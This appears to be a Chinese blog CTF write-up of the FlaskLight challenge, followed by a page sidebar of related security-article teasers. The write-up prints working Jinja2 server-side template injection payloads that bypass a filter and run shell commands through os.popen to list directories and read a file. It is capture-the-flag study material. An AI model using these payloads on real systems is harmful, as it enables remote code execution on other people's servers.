一天一道ctf 第51天

最新推荐文章于 2025-06-23 15:13:52 发布
原创 最新推荐文章于 2025-06-23 15:13:52 发布 · 181 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

[CSCCTF 2019 Qual]FlaskLight
在这里插入图片描述
查看源码有提示,模板注入做的很多了。?search={{7*7}}看一下注入的类型,确定是SSTI注入。在这里插入图片描述
因为之前做过类似的题,用的是catch_warnings类,这次想用一样的payload但是好像不行

?search= {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__.['__glo'+'bals__']['__builtins__']['__imp'+'ort__']('o'+'s').listdir('/')}}{% endif %}{% endfor %}

?search=[].__class__.__base__.__subclasses__()看一下是有catch_warnings这个类的,最后试下来是listdir被过滤了,换成popen('ls').read()就好了。
在这里插入图片描述

http://ce91ad90-010d-478f-91b2-e2294cdb4ac2.node4.buuoj.cn:81/?search= {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__['__glo'+'bals__']['__builtins__']['__imp'+'ort__']('o'+'s').popen('ls').read()}}{% endif %}{% endfor %}

在这里插入图片描述
拿到目录,再进入flasklight文件夹下

 {% for c in [].__class__.__base__.__subclasses__() %}{% if c.__name__=='catch_warnings' %}{{ c.__init__['__glo'+'bals__']['__builtins__']['__imp'+'ort__']('o'+'s').popen('ls /flasklight').read()}}{% endif %}{% endfor %}

在这里插入图片描述
最后cat /flasklight/coomme_geeeett_youur_flek拿到flag
在这里插入图片描述
还可以用site._Printer类和subprocess.Popen类来做
https://www.cnblogs.com/ersuani/p/13896200.html
添加链接描述

scrawman
关注
实验四 /*CTF实践*/
Tauil的博客
01-07 478
目的:获取靶机Web Developer 文件/root/flag.txt中flag。 基本思路:本网段IP地址存活扫描(netdiscover);网络扫描(Nmap);浏览HTTP 服务;网站目录枚举(Dirb);发现数据包文件 “cap”;分析 “cap” 文件,找到网站管理后台账号密码;插件利用(有漏洞);利用漏洞获得服务器账号密码;SSH 远程登录服务器;tcpdump另类应用。 实施细节如下: 1、发现目标 (netdiscover),找到WebDeveloper的IP地址。截图。 nmap.
一天一道ctf 第56(ascii偏移盲注)
scrawman的博客
08-18 628
[GYCTF2020]Ezsqli 先用二分法写一个脚本查一下表名,二分法快是快,但就是容易出错,用sleep延缓一下请求速度会好一些。or被过滤了所以informaiton.schema用不了,换成sys.x$schema_flattened_keys。 import requests import time url = "http://7630a861-14ab-4171-bfd2-dff39c2434b9.node4.buuoj.cn:81/" flag = "" payload = "1^(a
CTF中Web各种题目的解题姿势
05-25
Web题型是CTF中常考题型之一,它将实际渗透过程中的技术技巧转化为CTF赛题,主要考察选手在Web渗透技术方面的能力,由于Web渗透涉及的知识点较多,知识面比较广泛,因此系统的总结和练习Web类题,是快速掌握出题人思路的一种有效的方法。
python ssti正确利用方式
qq_49973474的博客
05-11 1186
很好 很有精神
2021-AFCTF
unexpectedthing的博客
04-17 3252
AFCTF search 考点 就是一个对find的命令了解,参数exec可以实现命令 wp payload /search.php?search=flag -exec cat {} \; google authenticator 考点 sql注入,拿到secret的密钥 google身份验证码的实现 蚁剑连接,无权限,进行信息收集 蚁剑反弹shell到vps 非交互式shell变为交互式shell的两种方式 写定时任务redis提权 wp 看到登录界面,扫一波,没有东西 尝试进行sql注入 先来个万
服务器模板注入 (SSTI)
since_2020的博客
09-08 376
服务器模板注入 (SSTI) 基本注入流程 ''.__class__ 显示这个东西的类 ''.__class__.base__ 找到这个的基类 ''.__class__.__base__.__subclasses__() 看基类的子类 敏感子类 popen、sys、os 因为''.__class__.__base__.__subclasses__()返回的是一个列表, 所以直接''.__class__.__base__.__subclasses__()[425]查看的就是popen这个 注意
一天一道ctf 第16(data伪协议,异或sql注入)
scrawman的博客
03-29 2259
看到unserialize()函数觉得是反序列化的题,但是没有看到class的定义。作者这边提示了useless.php,那就用filter伪协议一下看看。?file=php://filter/read=convert.base64-encode/resource=useless.php,没有反应,忘记了前面text也要绕过。 text的值可以用data伪协议输入,?text=data:text/plain,welcome to the zjctf&file=php://filter/read=.
写一下自已对ctf的了解,以便日后自已需要
m0_50987622的博客
11-07 6304
11.7 本人ctf小白,参加比赛基本处于摸鱼状态,也没有系统了解过ctf以及做过相关的实践和练习,但是,对这一块比较感兴趣,所以,只能说,在学习中,就跟我当初学makefile一样,做下记录,写点自已觉得对自已有用的东西,大概这样。 ctf总共分为五部分,misc杂项,crypto解密加密,pwn攻破设备、系统,reverse逆向渗透,web网络安全。500pt的题都很难。 首先,建立在你对前后端足够了解的基础上。 web安全就是黑服务器,pwn就是黑设备黑系统,至于怎么黑,仁者见仁智者见智,取决
初识CTF Day2 CTFHUB密码口令&SQL注入
suxinAL的博客
09-27 1028
前言 接着上次的继续往下做 git泄露结束了,现在开始看svn和hg 正文 首先看一下信息泄露部分的svn和hg 这里使用到一个工具dvcs-ripper 下载地址如下 https://github.com/kost/dvcs-ripper.git (注意:该工具一定要配置环境,具体如下图,或者查看readme.md) 安装好工具就简单了,我是在kali虚拟机里进行使用的 具体指令如下 cd dvcs-ripper-master ./rip-svn.pl -v -u http://challenge-d
一道简单的逆向题的解法 baby_crack
Peanuts
05-12 3301
刚开始接触逆向的题目师傅就给啦一道题目链接:https://pan.baidu.com/s/13cR9WUr1rydFjjbM2meyug  密码:jg3j    题目和wp都在里面下面开始记录首先ida大法好~一个美丽姑娘的头像接着f5大法好~题目本身比较简单,就先看一下第一个sub_4006DF函数这里的逻辑也是很清楚并没有什么拐弯的就是当i分别满足其中的条件后对v8这个数组进行赋值,之前第一...
SSTI基础学习
qq_63267612的博客
07-10 3938
一、什么是SSTI SSTI就是服务器端模板注入(Server-Side Template Injection),也给出了一个注入的概念。常见的注入有:SQL 注入,XSS 注入,XPATH 注入,XML 注入,代码注入,命令注入等等。SSTI也是注入类的漏洞,其成因其实是可以类比于sql注入的。sql注入是从用户获得一个输入,然后又后端脚本语言进行数据库查询,所以可以利用输入来拼接我们想要的sql语句,当然现在的sql注入防范做得已经很好了,然而随之而来的是更多的漏洞。SSTI也是获取了一个输入,然后再后
(补题)2015 9447 CTF : Search Engine
hollk’s blog
12-31 2572
本文对2015 9447 CTF : Search Engine这道题目做了非常详细讲解,因为出差加上只有下班的时间,这篇文章写了小半个月。在静态分析阶段遇到层层的阻碍,ida的伪C代码翻译不够准确,导致程序的执行流程捋的不清晰,好在gdb跟踪下来明白了。这道题有两种利用方式,这篇文章写的是利用Double Free这种技巧
[HDCTF 2023]SearchMaster
m0_73612768的博客
01-18 1060
Smarty 模板注入;
CTF 2015: Search Engine-fastbin_dup_into_stack
个人笔记
05-24 926
参考: [1]https://gsgx.me/posts/9447-ctf-2015-search-engine-writeup/ [2]https://blog.youkuaiyun.com/weixin_38419913/article/details/103238963(掌握利用点,省略各种逆向细节) [3]https://bbs.kanxue.com/thread-267876.htm(逆向调试详解) [4]https://bbs.kanxue.com/thread-247219.htm(双解法) 1,三连 2
CTF漏洞挖掘分析(二)
weixin_74738833的博客
06-23 682
SQL注入、XSS漏洞、CSRF漏洞、文件上传漏洞、XXE漏洞、SSRF漏洞、SSTI漏洞
2015 9447 CTF Search Engine
WocW的博客
06-12 1002
2015 9447 CTF : Search Engine] 前言 题目下载 于我来说难度不小,但是克服下来收获还是很多的。原文链接,在做这题的过程中确实用到了之前没看懂的部分,很多细节需要自己去实现一下才能搞明白,比如字节错位这样的… 整体利用了double free,泄露unsoredbin地址,任意地址分配。 分析 漏洞点: 在search里仅仅free了,没有设为null,可以再次free...
2015 9447 CTF : Search Engine
coco的博客
11-25 587
程序分析 index a sentence 首先入size大小的sentence,数据入到malloac出的一个chunk中。 对sentence中的每个word建立对应的结构体,也是分配到堆中,结构体中的组成为: struct word { word ptr //指向每个word的起始地址 word size //每个word的大小 sentence ptr //指向句子的起始地址...
初步认识SSTI
weixin_44377940的博客
04-03 1616
SSTI,即服务端模板注入,起因是服务端接收了用户的输入,将其作为 Web 应用模板内容的一部分,在进行目标编译渲染的过程中,执行了用户插入的恶意内容,从而导致各种各样的问题。 先举一个熟悉一点的语言模板作为例子:php模板引擎Twig 参考文章:http://drops.xmd5.com/static/drops/tips-10205.html https://www.cnblogs.com/h...
SSTI/沙盒逃逸详细总结
devil8123665的博客
03-09 1732
一 flask 1 、基本用法 >>> [].__class__.__base__ <class 'object'> >>> [].__class__.__mro__ (<class 'list'>, <class 'object'>) >>> [].__class__.__bases__ (<class 'object'>,) 2、取子类 [].__class__.__base__.__sub
ctf似乎是个加密“倒计时最后一天
最新发布
09-13
CTF竞赛中常见的加密方式有多种,以下为你介绍几种不同加密方式对“倒计时最后一天”进行加密的示例。 ### RSA加密 RSA是一种经典的非对称加密算法。参考示例中的Python代码,在实际应用时需先生成大素数 `p` 和 `q`,计算模数 `n`、欧拉函数 `s`、公钥指数 `e` 和私钥指数 `d`,再使用公钥对明文进行加密。 ```python import gmpy2 from Crypto.Util.number import bytes_to_long # 示例中的 p、q、e p = 0xEB4360DF0E0C824D57AE20700BBF6C1BA8324A94DB7B3608DDA40DE07A59082F q = 0xA5B8BA7304F15C70BA82FF60F8A4A5F156ED04896EC94A7E99B96B4E11727A8F e = 0x10001 n = p * q s = (p - 1) * (q - 1) d = gmpy2.invert(e, s) # 将明文转换为整数 plaintext = "倒计时最后一天" m = bytes_to_long(plaintext.encode()) # 加密 c = pow(m, e, n) print("加密后的密文: ", c) ``` ### Base64编码 Base64是一种常见的编码方式,可将二进制数据编码为ASCII字符。Python中可使用`base64`库进行编码。 ```python import base64 plaintext = "倒计时最后一天" encoded_bytes = base64.b64encode(plaintext.encode()) encoded_text = encoded_bytes.decode() print("Base64编码后的结果: ", encoded_text) ``` ### 凯撒密码 凯撒密码是一种简单的替换加密方法,将字母按照一定的偏移量进行替换。 ```python def caesar_encrypt(text, shift): encrypted = "" for char in text: if char.isalpha(): ascii_offset = ord('A') if char.isupper() else ord('a') encrypted += chr((ord(char) - ascii_offset + shift) % 26 + ascii_offset) else: encrypted += char return encrypted plaintext = "倒计时最后一天" shift = 3 # 偏移量 encrypted_text = caesar_encrypt(plaintext, shift) print("凯撒密码加密后的结果: ", encrypted_text) ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值